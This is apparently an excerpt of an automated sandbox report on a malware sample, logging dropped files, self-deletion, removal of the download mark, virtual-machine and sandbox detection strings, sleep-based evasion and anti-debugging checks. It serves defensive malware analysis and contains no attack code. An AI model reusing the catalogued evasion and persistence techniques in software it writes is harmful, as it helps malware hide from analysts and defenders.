Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C5A pushad ; iretd	0_2_007A1CC3
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C59 pushad ; iretd	0_2_007A1CC3
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1110 push 1A43E3D0h; retf	0_2_007A111A
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C8A pushad ; iretd	0_2_007A1CC3
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C8E pushad ; iretd	0_2_007A1CC3
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00403245 push eax; ret	4_2_00403276
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00403267 push eax; ret	4_2_00403276
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401C0A pushad ; iretd	4_2_00401C5C
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_0040321E push eax; ret	4_2_00403276
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401C23 pushad ; iretd	4_2_00401C5C
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401C27 pushad ; iretd	4_2_00401C5C
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00403235 push eax; ret	4_2_00403276

Source: oZB7n3wuNk.exe	Static PE information: section name: .text entropy: 7.6644446499082015
Source: birajci.2.dr	Static PE information: section name: .text entropy: 7.6644446499082015

Source: C:\Users\user\AppData\Local\Temp\9A25.exe	File created: C:\Users\user\AppData\Local\Temp\svchost015.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\9A25.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\birajci	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\birajci

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\ozb7n3wunk.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\birajci:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Query firmware table information (likely to detect VMs)

Source: C:\Windows\explorer.exe

System information queried: FirmwareTableInformation

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	API/Special instruction interceptor: Address: 7FFDB442E814
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	API/Special instruction interceptor: Address: 7FFDB442D584
Source: C:\Users\user\AppData\Roaming\birajci	API/Special instruction interceptor: Address: 7FFDB442E814
Source: C:\Users\user\AppData\Roaming\birajci	API/Special instruction interceptor: Address: 7FFDB442D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: oZB7n3wuNk.exe, 00000000.00000002.2178960201.000000000062E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\explorer.exe

File opened / queried: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 440	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1199	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 786	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 357	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3543	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 880	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 867	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 431	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 410	Jump to behavior

Source: C:\Windows\explorer.exe TID: 3796	Thread sleep count: 440 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2404	Thread sleep count: 1199 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2404	Thread sleep time: -119900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5960	Thread sleep count: 786 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5960	Thread sleep time: -78600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4876	Thread sleep count: 278 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6124	Thread sleep count: 342 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6124	Thread sleep time: -34200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6704	Thread sleep count: 357 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6704	Thread sleep time: -35700s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2404	Thread sleep count: 3543 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2404	Thread sleep time: -354300s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9A25.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor

Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000:
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	Binary or memory string: ParallelsVirtualMachine
Source: explorer.exe, 00000002.00000000.2163021353.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 0000000C.00000003.3138931305.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: 9A25.exe, 00000006.00000000.2736083292.0000000000401000.00000020.00000001.01000000.00000006.sdmp, 9A25.exe.2.dr	Binary or memory string: QEMUU
Source: explorer.exe, 0000000C.00000002.3368337522.000000000B983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00pi
Source: explorer.exe, 00000002.00000000.2159354736.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2163021353.000000000978C000.00000004.00000001.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137154672.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3140422641.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3361492931.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3154032054.0000000008C4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000C.00000002.3368337522.000000000B92D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\e\
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BB14000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 0000000C.00000002.3361492931.0000000008CEF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: l\\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}O
Source: explorer.exe, 0000000C.00000003.3133714532.0000000008A80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008A87000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: =C:Microsoft Hyper-V Generation Countersc%;Microsoft Hyper-V Generation CounterOFILE=user-PC
Source: explorer.exe, 0000000C.00000002.3361492931.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.2163021353.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 0000000C.00000003.3171889698.000000000B9A4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000@v
Source: explorer.exe, 0000000C.00000003.3194823909.000000000BABF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000\03
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	Binary or memory string: xmlphpvlczpl wpl xpacketimport hrefXML:NAMESPACEaid DOCTYPE ELEMENT ENTITY -- <mdb:mork:zAFDR aom saved from url=(-->xmlns=jobwmlRDFnzbsvgkmlgpxCaRxslJDFrssRSStagTAGXMIlmxloclogIMGtmxosmX3DVERCFLRCCncxxbkSCFrtcpseSDOmapnviofcasxdivLogopmlsmilrootpgmlxfdfXFDLBASEtei2xbeljnlpdgmlfeedFEEDinfobeancasevxmlsesxnotesitetasklinkxbrlGAEBXZFXFormqgisSMAIHDMLjsonpsplbodyheadmetadictdocuembedplistTEI.2xliffformsQBXMLTypeseaglehtml5myapptablestyleentrygroupLXFMLwindowdialogSchemaschemacommonCanvaslayoutobjectFFDataReporttaglibARCXMLgnc-v2modulerobloxXDFV:4Xara3DLayoutRDCManattachwidgetreportSchemewebbuyloaderdeviceRDF:RDFweb:RDFoverlayprojectProjectabiwordxdp:xdpsvg:svgCOLLADASOFTPKGfo:rootlm:lmxarchivecollagelibraryHelpTOCpackagesiteMapen-noteFoundryweblinkReportssharingWebPartTestRunpopularsnippetwhpropsQBWCXMLcontentkml:kmlSDOListkDRouteFormSetactionslookupssectionns2:gpxPaletteCatalogProfileTreePadMIFFileKeyFilepayloadPresetsstringsdocumentDocumentNETSCAPEmetalinkresourcenewsItemhtmlplusEnvelopeplandatamoleculelicensesDatabasebindingsWorkbookPlaylistBookFileTimeLinejsp:rootbrowsersfotobookMTSScenemessengercomponentc:contactr:licensex:xmpmetadiscoveryERDiagramWorksheetcrickgridHelpIndexWinampXMLrecoIndexTomTomTocen-exportAnswerSetwinzipjobmuseScorePHONEBOOKm:myListsedmx:EdmxYNABData1workspacePlacemarkMakerFileoor:itemsscriptletcolorBookSignaturexsd:schemadlg:windowFinalDraftVirtualBoxTfrxReportVSTemplateWhiteboardstylesheetBurnWizarddictionaryPCSettingsRedlineXMLBackupMetaxbrli:xbrlFontFamilys:WorkbookFictionBookdia:diagramdefinitionsNmfDocumentSnippetRootSEC:SECMetanet:NetfileCustSectionDieCutLabelPremierDataUserControljsp:includess:Workbookapplicationjsp:useBeancfcomponentparticipantSessionFilejasperReporthelpdocumentxsl:documentxsl:templatePremiereDataSettingsFileCodeSnippetsFileInstancetpmOwnerDataDataTemplateProject_DataTfrReportBSAnote:notepadFieldCatalogUserSettingsgnm:WorkbookLIBRARY_ITEMDocumentDatamso:customUIpicasa2albumrnpddatabasepdfpreflightrn-customizecml:moleculemuveeProjectRelationshipsVisioDocumentxsl:transformD:multistatusKMYMONEY-FILEBackupCatalogfile:ManifestPocketMindMapDiagramLayoutannotationSetLEAPTOFROGANSpublic:attachsoap:EnvelopepersistedQuerymx:ApplicationOverDriveMediaasmv1:assemblyHelpCollectionQvdTableHeaderSCRIBUSUTF8NEWw:wordDocumentPADocumentRootConfigMetadataBorlandProjectDTS:ExecutableMMC_ConsoleFilelibrary:libraryglade-interfacerg:licenseGroupdisco:discoveryAdobeSwatchbookaudacityprojectoffice:documentCoolpixTransfersqueeze_projectwirelessProfileProjectFileInfowsdl:definitionsScrivenerProjectfulfillmentTokenkey:presentationdynamicDiscoverylibrary:librariesClickToDvdProjectDataCladFileStorechat_api_responseMyApplicationDataKeyboardShortcutsDeepBurner_recordXmlTransformationdata.vos.BudgetVOIRIDASCompositionpresentationClipsoor:component-datalibraryDescriptionPowerShellMetadataResourceDictionaryxsf:xDocumentClassoffice:color-tableVisualStudioProjectActiveReportsLayoutwap-provisioningdocAfterEffectsProjectoor:component-sch
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}\
Source: explorer.exe, 0000000C.00000003.3194823909.000000000BA45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:2
Source: explorer.exe, 0000000C.00000002.3359137352.0000000007C2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 0000000C.00000002.3368337522.000000000B983000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}G\|k
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:1
Source: explorer.exe, 00000002.00000000.2159354736.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: svchost015.exe, 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: explorer.exe, 0000000C.00000003.3199415685.000000000BA11000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\
Source: explorer.exe, 0000000C.00000003.3194823909.000000000BA45000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: explorer.exe, 0000000C.00000003.3194823909.000000000B96A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00s
Source: explorer.exe, 00000002.00000000.2163555147.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000002.3352828466.0000000001035000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000C.00000003.3189499387.000000000BA0C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2159354736.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 9A25.exe, 00000006.00000003.2789038748.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, 9A25.exe, 00000006.00000002.2790089994.00000000007FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V m

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\explorer.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\birajci	Process queried: DebugPort	Jump to behavior

